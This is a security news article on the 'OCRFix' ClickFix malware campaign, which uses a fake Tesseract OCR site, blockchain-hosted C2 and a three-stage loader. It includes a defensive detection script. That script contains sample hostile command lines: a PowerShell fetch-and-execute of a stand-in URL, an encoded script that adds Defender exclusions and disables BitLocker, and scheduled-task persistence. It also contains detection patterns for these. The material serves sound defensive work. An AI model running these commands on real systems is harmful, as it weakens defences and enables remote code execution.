Example of the fake CAPTCHA loaded by the page | Image: CYJAX
A highly deceptive cyberattack is currently making the rounds, blending simple social engineering tricks with cutting-edge evasion tactics. Security researchers at CYJAX have uncovered a multi-stage malware campaign they have dubbed “OCRFix”. By impersonating a popular open-source tool, threat actors are tricking victims into handing over the keys to their systems, ultimately turning compromised machines into pawns within a larger botnet.
As the CYJAX report notes, “The combination of the well-known ClickFix technique with more advanced techniques such as EtherHiding gives a unique perspective on how threat actors can elevate their attack chains to target individuals.”
The attack begins with a classic typosquatting technique. The attackers set up a fake website at tesseract-ocr[.]com, designed to perfectly mimic the legitimate Optical Character Recognition (OCR) software known as Tesseract OCR. Because the legitimate tool is managed via a GitHub repository and does not have its own dedicated website, it became a prime target for domain impersonation.
What makes this initial trap unique is how victims are lured there. CYJAX discovered evidence that the malicious page utilized parameters linking back to ChatGPT. This strongly suggests the attackers are conducting LLM (Large Language Model) SEO poisoning, manipulating artificial intelligence tools into recommending the malicious site to users searching for OCR software. Additionally, analysis of the site’s code revealed elements commonly generated by AI, indicating this campaign was likely built with the assistance of LLMs.
Once a user lands on the fake website, they are presented with a familiar hurdle: a CAPTCHA verification prompt. However, this is where the “ClickFix” tactic comes into play.
Instead of clicking images of traffic lights, “Users were then instructed to open Windows PowerShell and paste a command into it to become verified.” The malicious code is automatically copied to the victim’s clipboard the moment they interact with the fake CAPTCHA box. If the user follows the instructions and pastes the command into their terminal, the attack officially begins.
To keep the victim distracted, the site redirects them to the legitimate Tesseract GitHub page while the malware silently downloads in the background.
To keep their operation running, the hackers need a way to communicate with infected computers without security scanners blocking their servers. To achieve this, they are using a highly advanced technique.
As the CYJAX report explains, “This technique is known as EtherHiding and occurs when key information is hidden on blockchains such as Ethereum or BNB through smart contracts.”
Specifically, the attackers use the BNB Smart Chain TestNet (a sandbox environment for blockchain developers) to host their Command and Control (C2) URLs within smart contracts. Because the malware queries a decentralized blockchain rather than a traditional hardcoded web address, security teams have a much harder time tracking and blocking the malicious traffic.
If the initial script runs successfully, it triggers a sophisticated, three-stage deployment process:
- The Loader (Update1.exe): The first executable queries the blockchain for a hidden address, downloads a disguised ZIP file, and unpacks the next stage of the malware.
- The Saboteur (setup_helper.exe): The second stage establishes persistence by creating scheduled tasks so the malware runs continuously. It also runs an encoded PowerShell script designed to severely weaken the system’s defenses, explicitly adding exclusion paths to Windows Defender and disabling mechanisms like BitLocker.
- The Listener (CfgHelper.exe): The final payload acts as a bot listener. It harvests system information (like the device name and IP address) and begins communicating with a central control panel hosted by the attackers. From this panel, the hackers can issue remote commands to the infected machine at any time.
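The defender's view of the chain above, as an added example that is not from the CYJAX report and not the campaign's own code: a small Python scanner that runs a handful of behavioural rules over constructed, Sysmon-style process-creation events. It flags the ClickFix paste itself (a hand-opened PowerShell fetching and running remote code), the stage-2 pattern of a binary in a user-writable directory launching an encoded PowerShell script, Defender exclusion changes, BitLocker being switched off, and a scheduled task whose action points into a user-writable path. The event shape, file paths, task name, sample command lines and rule names are all assumptions made for this example; the encoded script is built here by the example and is not the real payload.

```python
import base64
import binascii
import json
import re
from typing import Dict, List, Tuple


def encode_powershell(script: str) -> str:
    """Produce the form PowerShell's -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the stage-2 defence-weakening script (not the real one).
_STAGE2_SCRIPT = "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'; Disable-BitLocker -MountPoint 'C:'"

# Constructed sample telemetry in a simplified Sysmon Event ID 1 (process creation) shape.
# Paths, names and URLs are illustrative and carry no indicators from the report.
SAMPLE_EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/verify | iex"'}),
    json.dumps({"Image": r"C:\Users\victim\AppData\Local\Temp\setup_helper.exe",
                "ParentImage": r"C:\Users\victim\AppData\Local\Temp\Update1.exe",
                "CommandLine": "setup_helper.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Users\victim\AppData\Local\Temp\setup_helper.exe",
                "CommandLine": "powershell -nop -w hidden -enc " + encode_powershell(_STAGE2_SCRIPT)}),
    json.dumps({"Image": r"C:\Windows\System32\schtasks.exe",
                "ParentImage": r"C:\Users\victim\AppData\Local\Temp\setup_helper.exe",
                "CommandLine": r"schtasks /create /sc minute /mo 5 /tn CfgHelper /tr C:\Users\victim\AppData\Local\Temp\CfgHelper.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "powershell Get-ChildItem C:\\Logs"}),  # benign admin use
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts any unambiguous prefix).
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|invoke-expression|\biex\b|start-bitstransfer", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(r"(?:add|set)-mppreference\b[^;|]*-exclusion", re.IGNORECASE)
BITLOCKER_DISABLE = re.compile(r"disable-bitlocker|manage-bde(?:\.exe)?\s+(?:-off|-protectors\s+-disable)", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create|register-scheduledtask", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
# Parents a console opened by a person would have (Run dialog / Start menu, Windows Terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def expand_command_line(cmdline: str) -> Tuple[str, bool]:
    """Append the decoded body of any -EncodedCommand blob so the rules see the real script."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except (binascii.Error, ValueError):
        return cmdline, False  # not a real blob; treat as plain text
    return cmdline + "\n" + decoded, True


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(raw_json: str) -> List[str]:
    """Return the names of every rule this event trips (empty list if none)."""
    ev = json.loads(raw_json)
    image, parent = _basename(ev.get("Image", "")), _basename(ev.get("ParentImage", ""))
    cmd, had_encoded = expand_command_line(ev.get("CommandLine", ""))
    is_ps = image in POWERSHELL_IMAGES
    hits: List[str] = []
    # The ClickFix paste: a shell the user opened by hand fetching and running remote code.
    if is_ps and parent in INTERACTIVE_PARENTS and DOWNLOAD_EXEC.search(cmd):
        hits.append("clickfix_paste")
    # Stage 2: a binary in a user-writable directory spawning an encoded PowerShell script.
    if is_ps and had_encoded and USER_WRITABLE.search(ev.get("ParentImage", "")):
        hits.append("encoded_ps_from_user_dir")
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion")
    if BITLOCKER_DISABLE.search(cmd):
        hits.append("bitlocker_disable")
    # Persistence: a scheduled task whose action lives in a user-writable directory.
    if SCHTASKS_CREATE.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("scheduled_task_from_user_dir")
    return hits


def scan(events: List[str]) -> Dict[int, List[str]]:
    """Map event index to its rule hits, for every event that tripped at least one rule."""
    findings: Dict[int, List[str]] = {}
    for i, raw in enumerate(events):
        hits = analyze_event(raw)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The rules deliberately key on parent/child relationships and on the decoded script rather than on file names, because Update1.exe, setup_helper.exe and CfgHelper.exe are trivially renamed while "explorer.exe spawns PowerShell that downloads and evaluates code" and "an encoded script adds a Defender exclusion" are the behaviours the chain cannot avoid; in a real pipeline the same functions would be fed Sysmon or EDR process events instead of the constructed list.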
The OCRFix campaign proves that no matter how complex the backend infrastructure (utilizing blockchains, AI-assisted code, and multi-stage payloads), the entire attack still relies on a human being making a mistake.
Because techniques like ClickFix are proving to be highly effective, the best defense is a mix of technical restriction and user education. Organizations should ensure employees are trained to never paste unknown commands into administrative terminals, and IT teams should look to restrict PowerShell access strictly to authorized personnel.